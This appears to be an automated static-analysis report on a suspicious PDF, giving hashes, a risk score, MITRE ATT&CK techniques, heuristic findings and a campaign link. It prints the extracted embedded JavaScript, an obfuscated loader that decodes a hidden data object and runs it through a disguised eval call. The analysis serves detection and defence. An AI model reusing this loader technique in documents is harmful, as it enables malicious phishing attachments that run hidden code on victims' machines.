PDF static analysis report

Static analysis result for SHA-256 7675ff430a0f20c6…

SUSPICIOUS

PDF

4.2 KB First seen: 2026-05-04
MD5: 594818fa78db8909eab9b21b8fc6890a SHA-1: 0f13d5b8782e685ff7cf9965b73cedb0237e303e SHA-256: 7675ff430a0f20c6cab863de1506796376ef49f8c7e90566f7e734e24bc1288b
54 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript that appears to decode content from a data object named 'xampp' and then execute it. The ML classifier strongly indicates maliciousness. The JavaScript's obfuscated nature and the presence of embedded content suggest it's a downloader for a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign: shared payload 1bc4bf38a7 55 samples

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1CC 254 bytes
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6
Preview script
First 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){   rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd);        rf=re.one.value+re.two.value;this[rf](rc);